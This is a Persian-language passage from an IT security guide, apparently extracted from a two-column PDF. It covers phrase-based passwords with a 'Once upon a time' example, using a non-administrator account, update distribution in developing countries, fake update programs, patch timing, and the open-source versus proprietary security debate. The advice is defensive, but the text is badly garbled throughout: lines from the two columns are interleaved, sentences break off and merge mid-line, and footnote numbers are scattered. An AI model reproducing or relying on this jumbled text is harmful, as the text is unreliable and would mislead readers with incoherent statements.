ﻋﺒﺎﺭﺕ ﺍﻭﻟﻴﻪ ﺑﺎ ﭼﻨﺪ ﺣﺮﻑ ﺟﺎ ﺍﻓﺘﺎﺩﻩ. ﺍﺭﻗﺎﻡ ﺑﻪ ﺍﺗﻔﺎﻕ ﻫﻢ ﺭﺍ ﺩﺭ ﺑﺮ ﮔﻴﺮﺩ .ﺍﮔـﺮ ﺩﺭ ﺗﺎﻳـﭗ ﻛـﺮﺩﻥ
ﺣﺮﻭﻑ ﺿﻌﻴﻒ ﺑﺎﺷﻴﺪ ﻭ ﻓﺮﺩﻱ ﺍﺯ ﭘﺸﺖ ﺳـﺮ ﺑـﻪ ﺷـﻤﺎ ﻭ
ﺻﻔﺤﻪﻛﻠﻴﺪ ﻧﮕﺎﻩ ﻛﻨﺪ ،ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷـﻤﺎ ﺭﺍ
ﺑﻔﻬﻤﺪ.
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٦٤
Onupatithwa
ﻛﻪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﻛﻤﺘﺮ ﺍﺳـﺖ .ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺭﺍﻫﺒـﺮ ﻭ
ﻻ ﺑـﺎ ﻋﺒـﺎﺭﺕ Once upon a time, ﻣﻌﻤـﻮ ﹰ
ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﻪ ﻳﻜﻲ ﺑﺎﺷﻨﺪ )ﻧﻈﻴﺮ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ( ﻛـﺎﺭﺑﺮ
there wasﺷﺮﻭﻉ ﻣﻲﺷﻮﻧﺪ .ﺩﺭ ﺍﻳـﻦ ﻣﺜـﺎﻝ ﺍﺯ
ﻛﻠﻴﺔ ﻛﺎﺭﻫﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﺘﻴـﺎﺯ ﺩﺳﺘﺮﺳـﻲ ﻛﺎﻣـﻞ
ﺍﺑﺘﺪﺍﻱ ﻫﺮ ﻟﻐﺖ ﺩﻭ ﺣﺮﻑ ﮔﺮﻓﺘﻪ ﺷـﺪﻩ ﺗـﺎ ﻃـﻮﻝ
)ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﻳﺸﻪ ٢٧ﻳﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮ (٢٨ﺍﻧﺠﺎﻡ ﻣﻲ ﺩﻫﺪ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺑﻬﺘﺮ
ﻛﻠﻤﻪ ﻋﺒﻮﺭ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ ﻭ ﺩﺭ ﻋـﻴﻦ ﺣـﺎﻝ ﻗﺎﺑـﻞ
ﺍﺳﺖ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﺭﺍﻫﺒﺮﻱ ﺍﺯ ﻳـﻚ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻣﺠـﺰﺍ
ﺷﻨﺎﺳﺎﻳﻲ ﻧﺒﺎﺷﺪ.
ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ .ﺍﻳﻨﻜﺎﺭ ﺍﺣﺘﻤﺎﻝ ﺧﺮﺍﺏ ﺷﺪﻥ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﺳﻴـﺴﺘﻢ ﺭﺍ
T-1thuua
@oNup
ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻧﻔﻮﺫ ﻣﻬﺎﺟﻢ ﻧﻴﺰ ﺍﺯ ﺁﺳﻴﺐ ﻭﺍﺭﺩﻩ ﺑـﻪ ﻫﻤﺎﻥ ﻋﺒﺎﺭﺕ ﻗﺒﻠـﻲ ﻛـﻪ ﺩﺭ ﺁﻥ ﺟـﺎﻳﮕﺰﻳﻨﻲﻫـﺎ ﻭ
ﺳﻴﺴﺘﻢ ﺗﺎ ﺣﺪ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﻣﻲﻛﺎﻫﺪ. ﻋﻼﻣﺘﻬﺎﻱ ﮔﻔﺘﻪﺷﺪﻩ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺍﺳﺖ.
26 Privilege
27 Root Privilege
28 Administrator Privilege
٦٥ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭﺣﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑـﺴﺘﺔ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻛـﻪ ﺑـﻪ ﺭﻭﺵ ﻓـﻮﻕ .۲
ﺭﺍﻩ ﺍﻭﻝ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺗﻨﻬـﺎ ﮔﺰﻳﻨـﺔ ﻣﻨﺎﺳـﺐ downloadﻣﻲﺷﻮﺩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ ،ﺑﻠﻜـﻪ
downloadﻛــﺮﺩﻥ ﻭ ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔﺬﺍﺷــﺘﻦ ﻭﺻــﻠﻪﻫــﺎ ﻭ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺯﻣﺎﻥ ﺍﺟﺮﺍ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌـﻲ ﺭﺍ
ﺍﺻﻼﺣﻬﺎﻱ downloadﺷﺪﻩ ﺍﺳﺖ. downloadﻣﻲﻛﻨﺪ .ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﻨﻬـﺎ
ﭼﻨﺪ ﺭﺍﻩ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻭﺟﻮﺩ ﺩﺍﺭﺩ: ۵۰۰ﻛﻴﻠﻮ ﺑﺎﻳﺖ ﺣﺠﻢ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ -ﻛﻪ ﺍﻧﺪﺍﺯﺓ ﻛﻮﭼﻜﻲ
ﺑﺮﺍﻱ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ؛
ﺍﮔﺮ ﺳﺎﺯﻣﺎﻧﻲ ﺩﺍﺭﺍﻱ ﻣﺎﺷﻴﻨﻬﺎﻱ ﻣﺘﻌﺪﺩ ﺑﺎﺷﺪ ،ﺭﺍﻫﺒـﺮ ﻓﻨـﻲ • ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﺍﻳﻦ ﻓﻘﻂ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ
ﺑﺎﻳــﺪ ﻣــﺴﺌﻮﻟﻴﺖ downloadﻭ ﻧــﺼﺐ ﺑــﺴﺘﻪﻫــﺎﻱ ﻭﺍﻗﻌﻲ ﺭﺍ downloadﻣـﻲﻛﻨـﺪ ﻭ ﺳـﭙﺲ ﺁﻧـﺮﺍ ﻧـﺼﺐ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺁﻧﺮﺍ ﺑﺮ ﻋﻬﺪﻩ ﮔﻴﺮﺩ. ﻣﻲ ﻧﻤﺎﻳﺪ؛ ﻭ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌﻲ ﺷﺎﻳﺪ ﺍﻧﺪﺍﺯﻩﺍﻱ ﺩﺭ ﺣﺪﻭﺩ
ﻛﻠﻮﭘﻬــﺎﻱ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻳــﺎ ﮔﺮﻭﻫﻬــﺎﻱ ﺩﻳﮕــﺮ ﻣــﻲﺗﻮﺍﻧﻨــﺪ • ۳۰ﻣﮕﺎ ﺑﺎﻳﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ downloadﻛﻨﻨـﺪ ﻭ ﺁﻧﻬـﺎ ﺭﺍ ﺑﺮﺧﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺩﺍﺭﺍﻱ ﺗﻮﺍﺑﻊ ﺍﺯ ﭘﻴﺶ ﺗﻌﺮﻳـﻒ ﺷـﺪﻩﺍﻱ .۳
ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺍﻋﻀﺎ ﻗﺮﺍﺭ ﺩﻫﻨﺪ. ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺼﻮﺭﺕ ﭘﻮﻳﺎ ﺑﻪ ﺑﺮﺭﺳـﻲ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ
ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺧـﺪﻣﺎﺕ ﺍﻳﻨﺘﺮﻧﺘـﻲ )ISPﻫـﺎ( ٣١ﻣـﻲﺗﻮﺍﻧﻨـﺪ • ﺍﺭﺍﺋــﻪﺷــﺪﻩ ﻣــﻲﭘﺮﺩﺍﺯﻧــﺪ ﻭ ﺑــﺎ ﺍﺟــﺎﺯﺓ ﻛــﺎﺭﺑﺮ ﺁﻧﻬــﺎ ﺭﺍ
ﺑـــﺴﺘﻪﻫـــﺎﻱ ﺑـــﻪﺭﻭﺯﺭﺳـــﺎﻧﻲ ﻣﺤـــﺼﻮﻻﺕ ﺭﺍﻳـــﺞ ﻭ downloadﻭ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﻨﺪ.
ﺳﻴﺴﺘﻢ ﻋﺎﻣﻠﻬﺎﻱ ﻣـﺸﺘﺮﻙ ﺭﺍ ﺗﻬﻴـﻪ ﻭ ﺑـﺼﻮﺭﺕ ﻣﺤﻠـﻲ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺘﻬﺎ ﺑﺮﺍﻱ ﺁﺳﺎﻧﺘﺮ ﺷﺪﻥ ﻛﺎﺭ ﺷﻤﺎ ﻃﺮﺍﺣـﻲ ﺷـﺪﻩ ﺍﻧـﺪ .ﺩﺭ
ﻣﻴﺎﻥ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺗﻮﺯﻳـﻊ ﻛﻨﻨـﺪ .ﺑـﺎ ﺍﻳﻨﻜـﺎﺭ ﻧﻴﺎﺯﻣﻨـﺪﻱ ﻛﻠﻴﺔ ﻣﻮﺍﺭﺩ ﻭﻇﻴﻔﺔ ﺍﻧﺘﺨﺎﺏ ﺩﻗﻴﻖ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻣـﻮﺭﺩ
ISPﻫﺎ ﺑﻪ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻛـﻢ ﻣـﻲﺷـﻮﺩ ﻭ ﻟـﺬﺍ ﻧﻴﺎﺯ )ﻛﻪ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺧﺎﺹ ،ﻛﺎﺭ ﭘﻴﭽﻴﺪﻩﺍﻱ
ﻫﺰﻳﻨﺔ ﺁﻧﻬﺎ ﻧﻴﺰ ﻛﺎﻫﺶ ﻣﻲﻳﺎﺑﺪ. ﺍﺳﺖ( ﺑﻮﺳﻴﻠﺔ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻭ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﻧﺠﺎﻡ ﻣﻲﺷﻮﺩ.
ﻓﺮﻭﺷﮕﺎﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ •
ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﻗﺮﺍﺭ ﺩﻫﻨﺪ. ﻣﺸﻜﻞ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ
ﺩﺭ ﺳﺎﻝ ۲۰۰۳ﻫﻨﮕﺎﻣﻴﻜـﻪ ﻳـﻚ ﻛـﺮﻡ ﺍﻳﻨﺘﺮﻧﺘـﻲ ﺑﺎﻋـﺚ • ﻫﻤــﺎﻧﻄﻮﺭ ﻛــﻪ ﻣــﺸﺎﻫﺪﻩ ﻣــﻲﻛﻨﻴــﺪ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻓﺮﺁﻳﻨــﺪﻫﺎﻱ
ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺭﺍﻳﺎﻧﻪ ﻫﺎ ﺷﺪ ،ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﺮﺍﻱ ﺍﺟﺮﺍ ﺩﺭ ﻣﺤﻴﻂ ﻣﺘﺼﻞ ﺑـﻪ ﺍﻳﻨﺘﺮﻧـﺖ ﻃﺮﺍﺣـﻲ
ﻣﺨﺘﻠﻒ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻥ ﺍﻗﺪﺍﻡ ﺑـﻪ ﺗﻮﺯﻳـﻊ ﺑـﺴﺘﻪﻫـﺎﻱ ﺷــﺪﻩﺍﻧــﺪ ﻭ ﺑــﺴﺘﻪﻫــﺎﻱ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﭼﻨــﺪﻳﻦ ﻣﮕﺎﺑــﺎﻳﺘﻲ ﺭﺍ
ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺑـﺮ ﺭﻭﻱ ﺩﻳـﺴﻜﻬﺎﻱ ﻓـﺸﺮﺩﻩ ﺍﻗـﺪﺍﻡ ﻛـﺮﺩ. downloadﻣــﻲﻛﻨﻨــﺪ .ﻟــﺬﺍ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳــﻦ ﺭﻭﺵ ﺗﻨﻬــﺎ ﺩﺭ
ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺭﻭﺵ ﻫﻤﭽﻨﺎﻥ ﻫﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺩﺍﻣﻪ ﻳﺎﺑﺪ. ﺻﻮﺭﺗﻲ ﻧﺘﻴﺠﻪﺑﺨﺶ ﺧﻮﺍﻫﺪ ﺑـﻮﺩ ﻛـﻪ ﻳـﻚ ﺍﺭﺗﺒـﺎﻁ ﭘﺮﺳـﺮﻋﺖ
ﺍﻳﻨﺘﺮﻧﺘﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻭ ﻳـﺎ ﺑﺘﻮﺍﻧﻴـﺪ ﺍﺭﺗﺒـﺎﻁ ﺗﻠﻔﻨـﻲ ﺧـﻮﺩ ﺭﺍ ﺗـﺎ
ﻫﺮﭼﻨﺪ ﺳﻪ ﺷﻴﻮﺓ ﺍﺧﻴﺮ ﺗﻮﺯﻳﻊ ﺑﺴﺘﻪﻫـﺎﻱ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﭼﻨـﺪﺍﻥ
ﻻ ﺩﺭ ﻛـﺸﻮﺭﻫـﺎﻱ ﭼﻨﺪﻳﻦ ﺳﺎﻋﺖ ﺑﺮﻗﺮﺍﺭ ﻧﮕﻪ ﺩﺍﺭﻳـﺪ .ﺍﻣـﺎ ﻣﻌﻤـﻮ ﹰ
ﺭﺍﻳﺞ ﻧﻴﺴﺘﻨﺪ ،ﺍﻣﺎ ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺑﻪﺭﻭﺯ ﻧﮕﻬﺪﺍﺷﺘﻦ
ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﻳـﻚ ﺍﺳـﺘﺮﺍﺗﮋﻱ ﻣـﺆﺛﺮ ﺗﺠـﺎﺭﻱ ﺑـﺮﺍﻱ
ISPﻫﺎ ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻱ ﺩﺭﺣـﺎﻝ ﺗﻮﺳـﻌﻪ ﺗﺒـﺪﻳﻞ ﺩﻭ ﺭﻭﺵ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺍﻳﻦ ﻣﺸﻜﻞ ﻣﻮﺟﻮﺩ ﺍﺳﺖ:
ﺷﻮﻧﺪ .ﺍﮔﺮﭼﻪ ﺍﺯ ﺍﻳﻦ ﺍﺳﺘﺮﺍﺗﮋﻳﻬﺎﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺳﺘﻘﺒﺎﻝ ﻣـﻲﺷـﻮﺩ، ﺍﺯ ﺧﻴــﺮ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﻧــﺮﻡﺍﻓــﺰﺍﺭﻫــﺎﻱ ﻛــﺎﺭﺑﺮﺩﻱ ﻭ .۱
ﺍﻣﺎ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎﻳﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ ﻛـﻪ ﻣﻨـﺎﺑﻊ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺧﻮﺩ ﺑﮕﺬﺭﻳﺪ.
ﻣﺤﻠﻲ ﻧﻴﺰ ﻗﺎﺑـﻞ ﺍﻃﻤﻴﻨـﺎﻥ ﻫـﺴﺘﻨﺪ .ﺍﮔـﺮ ﻣﻨـﺎﺑﻊ ﻣﺤﻠـﻲ ﻗﺎﺑـﻞ
ﺍﺯ ﻓــﺮﺩ ﺩﻳﮕــﺮﻱ ﺑﺨﻮﺍﻫﻴــﺪ ﺑــﺴﺘﺔ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ ﺭﺍ .۲
ﺍﻃﻤﻴﻨﺎﻥ ﻧﺒﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻣﺮﻛﺰﻱ ﺑﺮﺍﻱ ﺗﻮﺯﻳﻊ ﻭﻳﺮﻭﺳـﻬﺎ
downloadﻛﻨﺪ ﻭ ﺟﺰﺋﻴﺎﺕ ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻞ ﻧﺼﺐ ﺭﺍ ﺍﺭﺍﺋﻪ
ﻭ ﺗﺮﺍﻭﺍﻫﺎ ﺗﺒﺪﻳﻞ ﺷﻮﻧﺪ.
ﺩﻫﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺴﺘﺔ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﻃﺮﻳـﻖ
ﺩﻳﺴﻜﻬﺎﻱ ﻓﺸﺮﺩﻩ ﻳﺎ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺗﻮﺯﻳﻊ ﺷﻮﺩ.
ﺑﻘﻴﺔ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﺎ ﺗﻮﺟﻪ ﺑـﻪ ﻧـﻮﻉ ﻋﻤﻠﻜـﺮﺩ ﺁﻳﺎ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺑﺎﻳﺪ ﭘـﺲ ﺍﺯ ﺍﻧﺘـﺸﺎﺭ،
ﺁﻧﻬﺎ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﻧﻤﺎﻳﻨﺪ .ﺗﺄﺧﻴﺮ ﭼﻨﺪ ﻫﻔﺘﻪﺍﻱ ﻳﺎ ﭼﻨﺪ ﻣﺎﻫﻪ ﺳﺮﻳﻌ ﹰﺎ ﻧﺼﺐ ﻧﻤﻮﺩ؟
ﺩﺭ ﻧﺼﺐ ﺍﻳﻦ ﺑﺴﺘﻪﻫﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺎﺟﺮﺍﺟﻮ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫـﺪ
ﺍﻳﻦ ﺑﺤﺚ ﭼﻨﺪﻳﻦ ﺩﻫﻪ ﻣﻴﺎﻥ ﻣﺘﺨﺼﺼﺎﻥ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺟﺮﻳﺎﻥ ﺑـﻮﺩﻩ
ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﻧﺼﺐ ﻛﻨﻨﺪ ،ﻣﺸﻜﻼﺕ ﺍﺣﺘﻤﺎﻟﻲ
ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﺯﻣﻴﻨﻪ ﺩﻭ ﺩﻳﺪﮔﺎﻩ ﻣﺘﻔﺎﻭﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ:
ﺭﺍ ﻛﺸﻒ ﻭ ﮔﺰﺍﺭﺵ ﻧﻤﺎﻳﻨﺪ ،ﻭ ﺑﺎ ﺍﻳﻨﻜﺎﺭ -ﭘـﻴﺶ ﺍﺯ ﺍﻳﻨﻜـﻪ
ﺷﻤﺎ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎ ﺭﺍ ﻧﺼﺐ ﻛﺮﺩﻩ ﺑﺎﺷﻴﺪ -ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ ﻣﻮﺍﻓﻘﺎﻥ :ﺍﮔﺮ ﺳﺮﻳﻌﹰﺎ ﺑﺴﺘﻪ ﻫﺎﻱ ﺑﻪ ﺭﻭﺯﺭﺳـﺎﻧﻲ ﺭﺍ ﻧـﺼﺐ
ﻓﺮﺻﺖ ﺍﺻﻼﺡ ﻧﻘﺎﻳﺺ ﺟﺪﻳﺪ ﺭﺍ ﺑﺪﻫﻨﺪ. ﻛﻨﻴﺪ ،ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺁﺳـﻴﺒﻬﺎﻱ ﺷـﻨﺎﺧﺘﻪﺷـﺪﻩ ﺍﻳﻤـﻦ
ﻛﺮﺩﻩﺍﻳـﺪ .ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻤﻨـﻲ ﺣﺎﺻـﻞ ﺍﺯ ﺑـﺴﺘﻪﻫـﺎﻱ
ﺑﺨﺶ ﺩﻭﻡ
ﺁﺧﺮﻳﻦ ﻧﻜﺘﻪ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﺮﻡ ﺍﻓﺰﺍﺭ ﻣﺘﻦﺑﺎﺯ ﻛﻤﻲ ﺑﺤﺚ ﻣـﻲﻃﻠﺒـﺪ. ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ ﻭ ﻧﺎﮔﻬﺎﻥ ﺧﺪﻣﺎﺕ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺭﺍﺋﻪ ﺑﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﺁﻥ
ﻣﺒﺎﺣﺜـﻪﺍﻱ ﻣﻴـﺎﻥ ﻃﺮﻓـﺪﺍﺭﺍﻥ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻣـﺘﻦﺑـﺎﺯ ﻭ ﻃﺮﻓــﺪﺍﺭﺍﻥ ﻗﻄﻊ ﺷﻮﺩ ﻭ ﻳﺎ ﺗﻮﺍﻧﺎﻳﻲ ﺧﺮﻳـﺪ ﺁﻧـﺮﺍ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ .ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺳﻨﺘﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎﻻﺧﺮﻩ ﻛـﺪﺍﻣﻴﻚ ﺑﺮﺧﻲ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎ ﻣﺎﻧﻨﺪ ﻭﻳﺮﻭﺱ ﻳﺎﺑﻬﺎ ﺍﮔﺮ ﺑﻄﻮﺭ ﻣﻨﻈﻢ )ﺭﻭﺯﺍﻧـﻪ ﻳـﺎ
ﺍﺯ ﺍﻳﻦ ﻣﺤﺼﻮﻻﺕ ﺍﻳﻤﻦﺗﺮ ﻫﺴﺘﻨﺪ. ﻫﻔﺘﮕﻲ( ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻧﺸﻮﻧﺪ ،ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺧﻄﺮﻧﺎﻛﺘﺮ ﺍﺯ ﺣـﺎﻟﺘﻲ
ﺑﺎﺷﺪ ﻛﻪ ﺍﺯ ﺁﻧﻬﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻧﻤـﻲﺷـﻮﺩ؛ ﺯﻳـﺮﺍ ﺍﮔـﺮ ﺍﺯ ﺁﻥ ﺍﺳـﺘﻔﺎﺩﻩ
ﻃﺮﻓﺪﺍﺭﺍﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﻣﻌﺘﻘﺪﻧﺪ:
ﻧﻤﺎﻳﻴﺪ ﺗﺼﻮﺭ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﺷﺮﺍﻳﻂ ﺍﻣﻨﻴﺘﻲ ﻣﻨﺎﺳﺒﻲ ﺑﺮﺧﻮﺭﺩﺍﺭﻳﺪ.
ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﻣﺤﺼﻮﻻﺕ ﻣﺘﻦﺑﺎﺯ ﺩﺭ ﺩﺳـﺘﺮﺱ •
٣٤
ﺍﺳﺖ ،ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﻪ ﺳﺎﺩﮔﻲ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺗﺠﺰﻳﻪ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ
ﺗﺤﻠﻴﻞ ﻛﻨﻨـﺪ ﻭ ﺗﻤـﺎﻣﻲ ﺍﺷـﻜﺎﻻﺗﻲ ﻛـﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺁﻧﻬـﺎ
ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯﻱ ﻛﻪ ﺑﺴﺮﻋﺖ ﺩﺭﺣـﺎﻝ ﮔـﺴﺘﺮﺵ ﻫـﺴﺘﻨﺪ
ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺳﻴﺴﺘﻢ ﻧﻔﻮﺫ ﻛﺮﺩ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻧﻤﺎﻳﻨﺪ.
